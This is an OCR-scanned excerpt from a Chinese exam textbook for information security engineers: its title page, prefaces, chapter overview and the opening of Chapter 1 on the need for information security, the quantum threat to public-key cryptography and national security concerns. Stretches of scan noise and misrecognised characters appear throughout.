à 


全 国 计 算 机 技术 与 软件 专业 技术 资格 OKE) 考试 指定 用 书 


4 


HE 主编 
傅 建 明 严 飞 


张 


JEH 
RE 组 纺 


a 


瑞 


杜 
全 国 计 算 机 专 


业 技 术 资格 考试 办 


j 


V 


Ni 
i 


| 


) 
V 


\ 
Ki 
x 


XK 


| 


XY 
Ww 
AN 


\ 


> 
> 


() 
\) 


| 


h 


W 


\) 


N 


C) 
XY 


WA 
MY 


N 
V 
Vy 


i 


\ 
V 
x 


C2 


AY 


(XX) 


0 


0 


0 
x) 


0 
0 
\\ 


N 


\ 
Mi 
mR 


V 
0 


0 
O 
N, 


N 
i) 


| 


\ 
i) 
O) 


CXIO 
AORN 


NN 


0 
V 


Y 


HY 


\ 
i) 
0 


\ 


0 


V 
O 


的 


| 


i 


\ 


N 


\ 


\) 


X 


| 


V 
| 
X 


| 


% 
0 


\ 
) 
X 


| 


言 息 安全 工程 师 教程 


m KAE 
副 主 编 : iA. SW. FK 


清华 大 学 出 版 社 
北 京 


内 容 简 介 


全 国 计 算 机 技术 与 软件 专业 技术 资格 〈 水 平 ) 考试 〈 以 下 简称 “计算 机 软件 考试 ”是 由 人 力 资源 和 
社会 保障 部 、 工 业 与 信息 化 部 领导 下 的 专业 技术 资格 考试 ， 纳 入 全 国 专业 技术 人 员 职 业 资格 证 书 制度 统一 
规划 。 为 适应 “十 三 五 ”期 间 计算 机 软件 行业 发 展 需要 ， 满 足 社 会 多 方 对 信息 安全 技术 人 员 的 迫切 需求 ， 


根据 人 力 资 源 和 社会 保障 部 办 公 厅 


厅 发 [2015]182 号 ), 在 2016 年 下 
程 师 (中 级 )”。“ 信 息 安全 工程 师 


《关于 2016 年 度 专业 技术 人 员 资 格 考试 计划 及 有 关 问 题 的 通知 》( 人 社 
年 计算 机 技术 与 软件 专业 技术 资格 〈 水 平 ) 考试 中 将 开 考 “信息 安全 工 
(中 级 )” 岗 位 的 人 才 评 价 工作 的 实施 ， 将 成 为 科学 评价 我 国信 息 安 全 专 


业 技 术 人 员 的 重要 手段 ， 也 将 为 我 国 培养 和 选拔 信息 安全 专业 技术 人 才 ， 发 挥 重 要 作用 。 

本 书 根据 信息 安全 工程 师 考试 大 纲 的 要 求 进行 编写 ， 内 容 主 要 包括 信息 安全 基本 概念 、 基 本 技术 
和 基本 应 用 等 方面 ， 讲 授 方法 注重 理论 联系 实际 ， 突 出 实用 技术 。 全 书 共 分 8 章 ， 具 体内 容 包 括 : 信 
息 安全 基础 、 密 码 学 基础 与 应 用 、 网 络 安全 基础 、 信 息 系统 安全 基础 、 应 用 系统 安全 基础 、 网 络 安全 
技术 与 产品 、 信 息 系统 安全 工程 、 应 用 安全 工程 。 

本 书 是 计算 机 软件 考试 中 “信息 安全 工程 师 ” 岗 位 的 考试 用 书 ， 也 可 作为 信息 安全 相关 专业 学 生 
和 从 业 人 员 学习 信 息 安 全 技术 的 教材 ， 还 可 用 做 相关 信息 技术 领域 从 业 人 员 的 技术 参考 书 。 
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由 人 力 资源 和 社会 保障 部 、 工 业 和 信息 化 部 共同 组 织 的 “全 国 计 算 机 技术 与 软件 专 
业 技 术 资 格 (水平) 考试”( 简 称 软考 )， 肩 负 着 科学 评价 选拔 软件 专业 技术 人 才 的 光荣 
使 命 ， 肩 负 着 正确 引导 软件 行业 专业 技术 人 员 潜 心 钻研 、 提 高 能 力 、 加 强 创新 的 光荣 使 
命 , 肩负 着 加 强 软件 行业 专业 技术 人 才 队 伍 建设 的 光荣 使 命 。 自 1991 年 开 考 以 来 ， 软考 
坚持 专业 化 、 国 际 化 、 品 牌 化 的 发 展 方向 ， 全 国 累计 报名 人 数 330 万 人 ， 培 养 选 拔 软件 
行业 专业 技术 人 才 64 万 人 ,部 分 考试 标准 与 日 本 、 韩 国 互 认 , 为 全 国 计 算 机 和 软件 专业 
ERAR (包括 香港 、 澳 门 和 台湾 地 区 来 大 陆 就 业 的 人 员 ) 提供 了 科学 的 评价 体系 和 评 
价 机 制 ， 为 推动 “两 化 ”深度 融合 ， 提 高 工业 信息 化 水 平 ， 走 新 型 工业 化 道路 提供 了 有 
力 支撑 。 

党 中 央 、 国 务 院 一 直 高 度 重视 信息 技术 产业 发 展 。 以 2000 年 的 《国务 院 关 于 印发 
鼓励 软件 产业 和 集成 电路 产业 发 展 的 若干 政策 的 通知 》( 国 发 2000】18 号 文件 ) 和 2011 
年 的 《国务 院 关 于 印发 进一步 鼓励 软件 产业 和 集成 电路 产业 发 展 的 若干 政策 的 通知 》( 国 
发 【2011】4 号 文件 ) 为 重要 标志 的 一 系列 政策 措施 ， 为 软件 产业 和 集成 电路 产业 乃至 
整个 信息 技术 产业 发 展 提供 了 强劲 动力 。2011 年 ， 我 国 软件 产业 实现 业务 收入 超过 1.84 
万 亿 元 ， 产 业 规模 是 2005 年 的 4.7 倍 ， 同 比 增长 32.4%， 超 过 “十 一 五 ”期 间 平均 增 速 
4.4 个 百分点 ， 实 现 了 “十 二 五 ”的 良好 开局 。 软 件 产 业 占 电子 信息 产业 比重 从 2000 年 
的 5.8% 上 升 到 19.9%。 软 件 企业 数量 超过 3 万 家 ， 从 业 人 数 超过 300 万 人 。2012 年 上 
半年 ， 我 国 软件 产业 实现 软件 业务 收入 10988 亿 元 ， 同 比 增长 26 296。 软 件 和 信息 服务 
业 的 持续 快速 发 展 ， 国 民 经 济 和 社会 信息 化 建设 的 深入 开展 ， 使 软件 人 才 和 信息 技术 人 
才 供 给 不 足 的 问题 依旧 突出 。 按 照 国 发 【2011】4 号 文件 提出 的 “努力 培养 国际 化 、 复 
合 型 、 实 用 性 人 才 ” 的 要 求 ， 工 业 和 信息 化 部 教育 与 考试 中 心 组 织 一 批 理论 水 平 高 、 实 
践 经 验 丰 富 的 专家 学 者 和 业界 精英 ， 结 合 考试 大 纲 和 软件 产业 技术 发 展 趋势 ， 对 原 有 的 
“全 国 计 算 机 技术 与 软件 专业 技术 资格 (水平) 考试 教材 和 辅导 用 书 ” 进 行 了 更 新 ， 为 广 
大 软件 行业 从 业 人 员 提 高 学 习 能 力 、 实 践 能 力 、 创 新 能 力 和 职业 道德 水 平 提供 了 依据 。 

当前 ， 我 国正 处 在 全 面 建 成 小 康 社会 的 决定 性 阶段 。 坚 持 走 中 国 特色 新 型 工业 化 、 
信息 化 、 城 镇 化 、 农 业 现代 化 道路 ， 推 动 信息 化 和 工业 化 深度 融合 、 工 业 化 和 城镇 化 良 
性 互动 、 城 镇 化 和 农业 现代 化 相互 协调 ， 促 进 工业 化 、 信 息 化 、 城 镇 化 、 农 业 现代 化 同 
步 发 展 ， 是 党 中 央 的 重要 战略 部 署 。 造 就 规模 宏大 、 素 质 优良 的 人 才 队伍 ， 推 动 我 国 由 
人 才 大 国 迈 向 人 才 强 国 ， 既 是 构成 这 一 重要 战略 部 署 的 紧迫 任务 ， 也 是 实施 这 一 重要 战 
略 部 署 的 关键 措施 。 从 现在 起 至 全 面 建成 小 康 社会 的 这 一 历史 时 期 ， 信 息 技术 仍然 是 走 
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中 国 特色 新 型 工业 化 、 信 息 化 、 城 镇 化 、 农 业 现 代 化 道路 的 先导 性 技术 ; 全 国 计 算 机 技 
术 与 软件 专业 技术 资格 水平) 考试 也 应 该 看 做 是 落实 党 的 十 八大 关于 “推进 各 类 人 才 
队伍 建设 ， 实 施 重大 人 才 工 程 ， 加 大 创新 创业 人 才 培 养 支持 力度 ， 重 视 实 用 人 才 培 养 ” 
指示 的 重要 组 成 部 分 。 好 雨 知 时 节 ， 当 春 乃 发 生 一 一 我 相信 ， 全 国 计 算 机 技术 与 软件 专 
业 技术 资格 水平 ) 考试 教材 和 辅导 用 书 的 及 时 更 新 必 将 为 我 国信 息 技术 人 才 队 伍 发 展 
壮大 、 为 软件 和 信息 服务 产业 做 大 做 强 、 为 服务 经 济 转型 升级 做 出 更 大 的 贡献 ; 同时 我 


代 信息 技术 ， 正 在 对 软件 和 信息 服务 产业 带 来 一 系列 深刻 变化 ， 也 对 软件 和 信息 技术 在 
各 个 领域 的 应 用 产生 重要 影响 ， 我 希望 ， 在 保持 这 套 教材 和 辅导 用 书 在 一 个 时 期 内 相对 
稳定 的 同时 ， 也 要 注意 及 时 反映 信息 技术 的 新 变化 、 新 进展 ， 以 跟 上 软件 和 信息 服务 产 
业 蓬勃 发 展 的 需要 ， 跟 上 信息 化 以 及 新 型 工业 化 、 城 镇 化 和 农业 现代 化 建设 蓬勃 发 展 的 
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人 类 社会 在 经 历 了 机 械 化 、 电 气 化 之 后 ， 进 入 了 一 个 轩 新 的 信息 化 时 代 。 在 信息 时 
代 ， 人 们 生活 和 工作 在 信息 空间 或 网 络 空间 中 。 所 谓 信息 空间 或 网 络 空间 就 是 人 们 赖 以 
生存 的 信息 环境 ， 它 是 所 有 信息 系统 的 集合 。 

在 信息 时 代 ， 信 息 成 为 一 种 重要 的 战略 资源 。 信 息 技术 改变 着 人 们 的 生活 和 工作 方 
式 ， 信 息 产 业 成 为 世界 第 一 大 产业 。 信 息 的 获取 、 存 储 、 传 输 、 处 理 和 安全 保障 能 力 成 
为 一 个 国家 综合 国力 的 重要 组 成 部 分 。 

我 国 非常 重视 信息 技术 人 才 队 伍 的 建设 。 伴 随 着 信息 产业 的 发 展 ， 人 力 资源 和 社会 
保障 部 、 工 业 与 信息 化 部 共同 组 织 了 “全 国 计 算 机 技术 与 软件 专业 技术 资格 〈 水 平 ) 考 
试 ” 通过 这 项 制度 ， 已 为 我 国 培养 选拔 了 几 十 万 计算 机 与 软件 服务 专业 技术 人 才 〈 包 括 
香港 、 澳门 和 台湾 地 区 来 大 陆 就 业 的 人 员 )。 部 分 考试 标准 与 日 本 、 韩 国 互 认 。 该 考试 由 
于 其 权威 性 和 严肃 性 ， 得 到 了 社会 各 界 及 用 人 单位 的 广泛 认同 ， 并 为 推动 国家 信息 产业 
发 展 ， 特 别 是 计算 机 和 软件 服务 产业 的 发 展 ， 以 及 提高 各 类 信息 技术 人 才 的 素质 和 能 力 
发 挥 了 重要 作用 。 

当前 ， 信 息 技术 与 产业 欣欣 向 荣 ， 处 于 空前 繁荣 的 阶段 ， 但 是 另 一 方面 ， 危 害 信息 
安全 的 事件 不 断 发 生 ， 信 息 安全 的 形势 非常 严峻 。 敌 对 势力 的 破坏 、 黑 客 入 侵 、 利 用 计 
算 机 实施 犯罪 、 恶 意 软件 侵扰 、 隐 私 泄露 等 ， 是 我 国信 息 网 络 空间 面临 的 主要 威胁 和 挑 
战 。 我 国 已 经 成 为 世界 信息 产业 大 国 ， 但 是 还 不 是 信息 产业 强国 ， 在 信息 产业 的 基础 性 
产品 研制 、 生 产 方面 还 比较 薄弱 , 例如 ,计算 机 操作 系统 等 基础 软件 和 CPU 等 关键 性 集 
成 电路 ， 我 国 现在 还 部 分 依赖 国外 的 产品 ， 这 就 使 得 我 国 的 信息 安全 基础 不 够 牢固 。 

随 着 计算 机 和 网 络 在 军事 、 政 治 、 金 融 、 工 业 、 商 业 等 部 门 的 广泛 应 用 ， 社 会 对 计 
算 机 和 网 络 的 依赖 越 来 越 大 ， 如 果 计 算 机 和 网 络 系统 的 安全 受到 破坏 ， 不 仅 会 带 来 巨大 
的 经 济 损失 ， 还 会 引起 社会 的 混乱 。 因 此 ， 确 保 以 计算 机 和 网 络 为 主要 基础 设施 的 信息 
系统 的 安全 已 成 为 世人 关注 的 社会 问题 和 信息 科学 技术 领域 的 研究 热点 。 当 前 ， 我 国正 
处 在 全 面 建成 小 康 社会 的 决定 性 阶段 ， 实 现 我 国 社会 信息 化 并 确保 信息 安全 是 我 国 全 面 
建成 小 康 社会 的 必要 条 件 之 一 而 要 实现 我 国 社会 信息 化 并 确保 信息 安全 的 关键 是 人 才 ， 
这 就 需要 我 们 培养 造就 规模 宏大 、 素 质 优良 的 信息 化 和 信息 安全 人 才 队 伍 。 

2014 年 ， 习 近 平 主席 在 中 央 网 络 安全 与 信息 化 领导 小 组 会 议 上 指出 : 没有 网 络 安全 
就 没有 国家 安全 ， 没 有 信息 化 就 没有 现代 化 。 网 络 安全 和 信息 化 是 事 关 国家 安全 和 国家 
发 展 、 事 关 广大 人 民 和 群众 工作 生活 的 重大 战略 问题 ， 要 从 国际 国内 大 势 出 发 ， 总 体 布局 ， 
统筹 各 方 ， 创 新 发 展 ， 努 力 把 我 国 建成 网 络 强国 。 
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“十 三 五 ”时 期 ， 我 国 要 积极 推动 网 络 强 国 建设 。 网 络 强国 涉及 技术 、 应 用 、 文 化 、 
安全 、 立 法 、 监 管 等 诸多 方面 ， 不 仅 要 突出 抓 好 核心 技术 突破 ， 还 要 提供 更 加 安全 可 靠 
的 软 硬 件 支撑 ， 加 快 建设 高 速 、 移 动 、 安 全 、 泛 在 的 新 一 代 信 息 基础 设施 ， 在 不 断 推 进 
新 技术 新 业务 应 用 ， 繁 荣 发 展 互联 网 经 济 的 同时 ， 要 强化 网 络 和 信息 安全 ， 而 培育 高 素 
质 人 才 队 伍 是 实施 网 络 强 国 战略 的 重要 措施 。2015 年 ， 国 务 院 学 位 委员 会 和 教育 部 增设 
“网 络 空间 安全 ”一 级 学 科 。 我 国信 息 安全 学 科 建 设 和 人 才 培 养 , 迎 来 了 全 面 高 速 发 展 的 
新 阶段 。 

与 此 同时 ， 全 国 计 算 机 技术 与 软件 专业 技术 资格 〈 水 平 ) 考试 办 公 室 决定 开始 开展 
“信息 安全 工程 师 ” 岗 位 的 人 才 评 价 工作 ， 以 加 快 推动 信息 安全 专业 的 人 才 队 伍 建 设 。 我 
们 相信 ， 这 一 措施 将 成 为 科学 评价 我 国信 息 安全 专业 技术 人 员 的 重要 手段 ， 也 将 为 我 国 
培养 和 选拔 信息 安全 专业 技术 人 才 ， 发 挥 重 要 作用 。 

为 了 配合 “信息 安全 工程 师 ” 考 试 工作 的 开展 ， 给 准备 参加 考试 的 技术 人 员 提 供 一 
本 适用 的 教材 ， 我 们 编写 了 《信息 安全 工程 师 教程 》 一 书 。 全 书 共 分 8 章 ， 主 要 内 容 
如 下 : 

第 1 章 信息 安全 基础 ， 主 要 介绍 : 信息 安全 概念 、 信 息 安 全 法 律 法 规 、 信 息 安全 管 
理 基 础 和 信息 安全 标准 化 知识 。 本 章 的 内 容 是 基本 的 ， 但 是 对 信息 安全 技术 人 员 来 说 是 
重要 的 。 

第 2 章 密码 学 基础 与 应 用 ， 主 要 讲解 ;密码 学 的 基本 概念 、 分 组 密码 、 序 列 密码 、 
Hash 函数 、 公 钥 密 码 体制 、 数 字 签名 、 认 证 和 密 钥 管理 。 本 章 的 介绍 强调 基本 概念 、 基 
本 技术 和 基本 应 用 技术 ， 努 力 避免 较 复 杂 的 数学 理论 。 

第 3 章 网 络 安全 基础 ， 主 要 介绍 : 计算 机 网 络 基本 知识 、 网 络 安全 的 基本 概念 、 网 
络 安全 威胁 、 网 络 安全 防御 和 无 线 网 络 安全 。 

第 4 章 信息 系统 安全 基础 ， 主 要 讨论 : 计算 机 设备 安全 、 操 作 系 统 安全 、 数 据 库 系 
统 的 安全 、 恶 意 代码 、 计 算 机 取证 和 嵌入 式 系统 安全 。 

第 5 章 应 用 系统 安全 基础 ， 主 要 讲解 : Web 安全 、 电 子 商务 安全 、 信 息 隐 藏 、 网 
络 与 情 和 隐私 保护 。 

第 6 章 网 络 安全 工程 ， 主 要 介绍 : 网 络 安全 需求 分 析 与 基本 设计 、 网 络 安全 产品 的 
配置 与 使 用 、 网 络 安全 风险 评估 实施 和 网 络 安全 防护 技术 的 应 用 。 本 章 强 调 网 络 安全 的 
基本 技术 与 应 用 。 

第 7 章 信息 系统 安全 技术 与 产品 ,主要 介绍 : 访问 控制 、 信 息 系统 安全 的 需求 分 析 
与 设计 准则 、 信 息 系 统 安全 产品 的 配置 与 使 用 和 信息 系统 安全 测评 。 本 章 强调 信息 系统 
安全 的 基本 技术 与 应 用 。 

第 8 章 应 用 安全 工程 ， 主 要 介绍 ; Web 安全 的 需求 分 析 与 基本 设计 、 电 子 商 务 安 
全 的 需求 分 析 与 基本 设计 、 和 嵌入 式 系统 的 安全 应 用 、 数 字 水 印 在 版 权 保护 中 的 应 用 和 位 
置 隐私 保护 技术 的 应 用 。 本 章 强调 应 用 系统 安全 的 基本 技术 与 应 用 。 
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第 1 章 信息 安全 基础 


本 章 的 内 容 是 信息 安全 的 基础 之 一 ， 主 要 介绍 信息 安全 概念 、 信 息 安 全 法 律 法 规 、 
信息 安全 管理 基础 和 信息 安全 标准 化 知识 。 

本 章 的 内 容 是 最 基本 的 ， 对 于 从 事 信 息 安 全 领域 工作 的 读者 来 说 ， 具 有 重要 指导 
意义 。 


11 信息 安全 概念 


本 节 介 绍 信息 安全 的 基本 概念 ， 主 要 介绍 信息 安全 的 时 代 需 求 、 网 络 空间 安全 学 科 
的 内 涵 、 研 究 内 容 、 理 论 基 础 、 方 法 论 基 础 等 方面 的 内 容 。 


1.1.1 信息 安全 是 信息 时 代 永 恒 的 需求 


人 类 社会 在 经 历 了 机 械 化 、 电 气 化 之 后 ， 进 入 了 一 个 轩 新 的 信息 化 时 代 。 在 20 世 
纪 中 叶 ， 出 现 了 一 批 重要 的 理论 : 信息 论 、 控 制 论 、 系 统 论 、 图 灵机 理论 、 冯 。 诺 伊 曼 
理论 、 计 算 理论 等 等 ， 它 们 共同 构成 了 信息 科学 技术 的 理论 基础 。 在 这 些 理论 的 支撑 和 
指导 下 ， 信 息 科学 技术 得 到 突飞猛进 的 发 展 ， 取 得 了 辉煌 的 成 就 ， 造 就 了 信息 技术 与 产 
业 几 十 年 的 繁荣 。 信 息 产业 超过 钢铁 、 机 械 、 石 油 、 汽 车 、 电 力 等 传统 产业 ， 成 为 世界 
第 一 大 产业 。 信 息 和 信息 技术 改变 着 人 们 的 生活 和 工作 方式 。 离 开 计算 机 、 网 络 、 电 视 
和 手机 等 电子 信息 设备 ， 人 们 将 无 法 正常 生活 和 工作 。 信 息 就 像 水 、 电 、 石 油 一 样 ， 与 
所 有 行业 、 所 有 人 都 相关 ， 成 为 一 种 基础 资源 。 因 此 ， 信 息 成 为 当今 最 具 活 力 的 生产 要 
素 和 最 重要 的 战略 资源 ， 以 计算 机 网 络 为 核心 的 信息 系统 成 为 国家 的 重要 基础 设施 。 

经 过 30 多 年 的 改革 开放 ， 我 国 已 经 成 为 信息 产业 大 国 。 大 多 数 中 低档 电子 信息 产 
品 的 产量 和 拥有 量 ， 我 国都 居 世 界 第 一 。 例 如 ， 个 人 计算 机 、 手 机 、 电 话机 、 电 视 机 等 
电子 信息 产品 的 产量 和 拥有 量 ， 我 国都 居 世 界 第 一 。2009 年 1 月 8 日, 我 国 国防 科技 大 
学 研制 出 天 河 -1 号 超级 计算 机 ， 运 算 速 度 2.57 千 万 亿 次 / 秒 ， 排 名 世界 第 一 。2013 年 5 
月 国防 科技 大 学 又 研制 出 天 河 -I 号 超级 计算 机 ( 见 图 1-1)， 运 算 速 度 33.86 TILK 
秒 ， 排 名 世界 第 一 ， 而 且 比 排 在 第 二 位 的 美国 “泰坦 ”计算 机 快 一 倍 。 但 是 ， 我 国 还 不 
是 信息 产业 强国 。 我 国 在 诸如 CPU 芯片 、 计 算 机 操作 系统 等 核心 芯片 和 基础 软件 方面 仍 
然 依赖 国外 产品 。 
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(1) 天 河 -I 型 超级 计算 机 (2) 天 河 -I 型 超级 计算 机 


图 1-1 天 河 超级 计算 机 


当前 ， 除 了 电子 信息 科学 技术 继续 高 速 发 展 之 外 ， 量 子 和 生物 等 新 型 信息 科学 技术 
正在 建立 和 发 展 。 量 子 信息 科学 技术 的 研究 和 发 展 催生 了 量子 计算 机 、 量 子 通信 和 量子 
密码 。 早 在 2001 年 美国 IBM 公司 就 研制 出 7 个 量子 位 的 示例 型 量子 计算 机 ， 向 世界 宣 
告 了 量子 计算 机 原理 的 正确 性 和 可 行 性 。2011 年 9 月 2 日 , 美国 加 州 大 学 圣 芭 芭 拉 分 校 
的 科学 家 宣布 ， 研 制 出 具有 冯 。 诺 依 曼 计算 机 结构 的 量子 计算 机 ， 并 成 功 地 进行 了 小 合 
数 的 因子 分 解 实验 (参见 图 1-2) 。2012 年 3 月 1 日 IBM 公司 又 宣布 找到 了 一 种 可 以 大 
规模 提升 量子 计算 机 量子 位 数 的 关键 技术 。2014 年 4 月 ， 奥 地 利 科学 家 实现 了 103 量子 
位 的 量子 纠缠 态 ， 大 大 超过 以 前 的 11 量子 位 。 同 时 期 ， 美 国 密歇根 大 学 制造 出 世界 上 第 
- 块 可 升级 且 可 大 规模 生产 的 量子 计算 机 芯片 。 由 此 可 以 看 出 ， 量 子 计算 技术 正在 迅速 
除了 美国 之 外 ， 加 拿 大 的 量子 计算 机 技术 也 取得 了 长 足 的 发 展 。2007 年 2 月 加 拿 大 
D-Wave System 公司 宣布 研制 出 世界 上 第 一 台 商 用 16 量子 位 的 量子 计算 机 (参见 图 1-3)。 
2008 年 5 月 提高 到 48 量子 位 .2011 年 5 月 30 日 又 提高 到 128 量子 位 , 并 开始 公开 出 售 ， 
1000 万 美元 一 台 。 美 国 著名 军火 制造 商洛 克 希 德 马丁 公司 购买 了 这 种 量子 计算 机 ， 用 于 
新 式 武器 的 研制 。2013 年 初 又 大 幅度 地 提高 到 512 量子 位 ， 价 格 也 上 升 为 1500 万 美元 
一 台 。 著 名 信息 服务 商 谷 歌 公 司 购买 了 这 种 量子 计算 机 ， 用 于 提高 信息 搜索 效率 和 研究 
量子 人 工 智能 。 
2014 年 9 月 3 日 谷歌 公司 宣布 投资 50 亿美 元 与 UCSB 的 研究 团队 联合 研制 量子 计 
算 机 。2015 年 12 月 19 日 中 国 阿里 巴巴 公司 与 中 科 院 宣布 联合 研究 量子 计算 和 量子 通信 。 
这 是 我 国 首次 由 企业 参与 的 量子 信息 科学 技术 的 研究 ， 具 有 重要 的 意义 。 


图 1-2 美国 加 州 大 学 圣 芭 芭 拉 分 校 
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的 量子 计算 机 图 1-3 加拿大 D-Wave System 公司 的 量子 计算 机 


生物 信息 科学 技术 的 研究 与 发 展 ， 推 动 了 DNA 计算 机 的 研究 。1994 年 美国 南 加 州 


大 学 的 L.Adleman 提出 DNA 
多 现在 的 电子 计算 所 无 法 比拟 
存储 密度 和 极 低 的 能 量 消耗 。2 
2012 年 2 月 8 日 美国 加 州 斯 区 
机 ， 可 以 破译 DNA 芯片 中 的 加 


| 


综 上 可 知 ， 电 子 信息 技术 与 产业 正 处 在 空前 繁荣 的 阶段 ， 量 子 和 生物 等 新 型 信息 科 


学 正在 高 速 发 展 。 


+ 算 的 思想 ， 并 在 试管 液体 中 进行 实验 。 DNA 计算 具有 许 
优点 参见 图 1-4) 。 如 ， 具 有 高 度 的 并 行 性 、 极 高 的 
003 年 ， 以 色 列 就 研制 出 可 以 人 机 交互 的 DNA 计算 机 。 
1 普 斯 研究 院 和 以 色 列 理工 学 院 联合 开发 出 一 种 生物 计算 
密 图 像 。 
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图 1-4 DNA 计算 机 


信息 安全 是 信息 的 影子 ， 哪 里 有 信息 哪里 就 存在 信息 安全 问题 。 


当前 ， 一 方面 是 信息 技术 与 产业 的 空前 繁荣 。 另 一 方面 危害 信息 安全 的 事件 不 断 发 


E 
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生 ， 敌 对 势力 的 破坏 、 恶 意 软件 的 入 侵 、 黑 客 攻 击 、 利 用 计算 机 犯罪 、 网 络 有 害 信息 泛 
滥 、 个 人 隐私 泄露 等 ， 对 信息 安全 构成 了 极 大 威胁 ， 信 息 安 全 的 形势 是 严峻 的 。 

黑客 入 侵 已 经 成 为 一 种 经 常 性 、 多 发 性 的 信息 安全 事件 ， 每 年 都 会 发 生 许多 起 黑客 
入 侵 的 严重 事件 。 

利用 计算 机 进行 经 济 犯 罪 己 超过 普通 经 济 犯罪 。 当 前 ， 钓 鱼网 站 、 电 信 诈 骗 、QQ 
诈骗 等 犯罪 活动 ， 己 经 成 为 直接 骗取 民众 钱财 的 常见 形式 ， 严 重 扰乱 了 社会 治安 。 

计算 机 病毒 已 超过 儿 万 种 ， 而 且 还 在 继续 增加 。 追 求 经济 和 政治 利益 、 团 体 作案 、 
形成 地 下 产业 链 ， 已 经 成 为 计算 机 病毒 事件 的 新 特点 。 

信息 技术 的 发 展 促进 了 军事 革命 ， 信 息 战 和 网 络 战 成 为 新 的 作战 形式 。 早 在 1995 
年 美国 就 提出 了 信息 作战 的 概念 ， 并 成 立 了 信息 作战 指导 委员 会 。 两 次 海湾 战争 美国 都 
成 功 地 实施 了 信息 战 。2007 年 美国 成 立 了 网 络 作战 司令 部 。2011 年 5 月 16 日 美国 公布 
“网 络 空间 国际 战略 ” 7 月 14 日 又 公布 了 “网 络 空间 作战 战略 ” 提出 了 “ 陆 、 海 、 空 、 
天 、 网 络 ”5 维 一 体 的 美国 国家 安全 概念 。2012 年 1 月 5 日 美国 宣布 把 战略 重心 放 到 亚 
太 地 区 。2016 年 2 月 美国 政府 公布 “网 络 安全 国家 行动 计划 (NCAP)”。 

2010 年 ， 美 国 和 以 色 列 黑客 利用 APT(Advanced Persistent Threaten) kti, WRES 
了 伊朗 纳 坦 效 核 工厂 的 上 千 台 铀 浓缩 离心 机 ， 重 创 了 伊朗 的 核 计 划 。 这 一 事件 表明 : 黑 
客 攻 击 已 从 过 去 的 窃取 信息 为 主 的 “ 软 打 击 ” 上 升 到 毁坏 硬件 设备 的 “ 硬 摧毁 ”阶段 。 
这 给 关系 到 国计民生 的 工业 控制 系统 安全 敲 响 了 警钟 。 

随 着 计算 机 网 络 的 广泛 使 用 ， 网 上 有 害 信息 泛滥 ， 个 人 隐私 泄露 严重 ， 严 重 危害 网 
民 的 身心 健康 ， 危 害 社会 的 安定 团结 。 因 此 ， 网 络 环境 亟待 治理 和 规范 。 

根据 中 国 互联 网 信息 中 心 CNNIC 的 《2013 年 中 国 网 民 信息 安全 状况 研究 报告 》, 仅 
在 2013 年 上 半年 中 国 遇 到 过 网 络 安全 问题 的 网 民 比 例 就 高 达 74.1%, 影响 人 数 达 到 4.38 
亿 人 。 据 国家 互联 网 应 急 中 心 (CNCERT) 统计 ， 从 2013 年 1 月 到 9 月 底 ， 监 测 发 现 共 
有 52 万 个 控制 我 国电 脑 的 木马 控制 端 IP, FEM 25 万 个 位 于 境外 ; 共有 17822 个 僵尸 网 
络 控制 端 瑟 ， 其 中 10254 个 位 于 境外 ;， 共 发 现 境外 64 万 台 主 机 曾 对 我 国 发 起 过 攻击 。 

除 此 之 外 ， 科 学 技术 的 进步 也 对 信息 安全 提出 新 的 挑战 。 

量子 信息 的 一 个 奇妙 特性 是 具有 闭 加 态 和 纠缠 态 。 一 个 n 量子 比特 的 存储 器 同时 存 
储 着 > 个 数据 状态 。 这 种 奇妙 特性 ， 使 得 量子 计算 具有 并 行 性 。 例 如 ， 当 量子 计算 机 对 
一 个 n 量子 比特 的 数据 进行 处 理 时 , 量子 计算 机 实际 上 是 同时 对 > 个 数据 状态 进行 了 处 
理 。 正 是 这 种 并 行 性 使 得 原来 在 电子 计算 机 环境 下 的 一 些 难于 计算 的 困难 问题 ， 在 量子 
计算 机 环境 下 却 成 为 容易 计算 的 。 量 子 计 算 机 的 这 种 超 强 计算 能 力 ， 使 得 基于 计算 复杂 
性 的 现 有 公 钥 密码 的 安全 受到 挑战 。 根据 目前 的 估算 ，1448 量子 位 的 量子 计算 机 可 以 攻 
Wi 256 位 的 椭圆 曲线 密码 (ECC)，2048 量子 位 的 量子 计算 机 可 以 攻破 1024 位 的 RSA 
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密码 。 值 得 注意 的 是 ， 我 国 居民 二 代 身 份 证 正在 使 用 256 位 的 椭圆 曲线 密码 ， 国 内 外 的 
许多 电子 商务 系统 正在 使 用 1024 位 的 RSA 密码 。 与 量子 计算 机 类 似 , DNA 计算 机 也 是 
并 行 计算 的 ， 因 此 同样 对 现 有 密码 构成 严重 的 潜在 威胁 。 

目前 可 用 于 密码 破译 的 量子 计算 算法 主要 有 Grover 算法 和 Shor 算法 。 对 于 密码 破 
PKL, Grover 算法 的 作用 相当 于 把 密码 的 密 钥 长 度 减 少 一 半 。 而 Shor 算法 则 可 以 对 目 
前 广泛 使 用 的 RSA、EIGamal、ECC 公 钥 密码 和 DH 密 钥 协商 协议 进行 有 效 攻击 。 这 说 
明 在 量子 计算 环境 下 ，RSA、EIGamal、ECC 公 钥 密码 和 DH 密 钥 协商 协议 将 不 再 安全 。 

必须 指出 的 是 , 目前 加 拿 大 的 量子 计算 机 属于 专用 型 量子 计算 机 , 它 能 够 执行 Grover 
算法 ， 尚 不 能 执行 Shor 算法 。 美 国 加 州 大 学 圣 芭 芭 拉 分 校 的 量子 计算 机 可 以 执行 Shor 
算法 ， 但 量子 位 数 太 少 。 这 也 就 是 说 ， 目 前 的 量子 计算 机 尚 不 能 对 现 有 公 钥 密码 构成 实 
际 的 威胁 。 但 是 ， 随 着 量子 计算 技术 的 发 展 ， 总 有 一 天 会 对 现 有 公 钥 密码 构成 实际 的 
威胁 。 

在 量子 计算 环境 下 我 们 仍然 需要 确保 信息 安全 ， 仍 然 需 要 使 用 密码 ， 但 是 我 们 使 用 
什么 密码 呢 ? 这 是 摆 在 我 国 面前 的 一 个 重大 战略 问题 。 

除 此 之 外 ， 我 国正 在 大 力 发 展 新 一 代 电 子 信息 产业 等 战略 性 新 兴 产 业 。 物 联网 、 云 
计算 、 三 网 融合 、 大 数据 处 理 等 新 型 信息 系统 的 出 现 ， 也 给 信息 安全 提出 了 新 的 需求 和 
Peter), 

对 于 我 国 来 说 ， 信 息 安 全 形势 的 严峻 性 ， 不 仅 在 于 上 面 这 些 威胁 的 严重 性 ， 更 在 于 
我 国 在 诸如 CPU 芯片 、 计 算 机 操作 系统 等 核心 芯片 和 基础 软件 方面 主要 依赖 国外 产品 。 
这 就 使 我 国 的 信息 安全 失去 了 自主 可 控 的 基础 。 

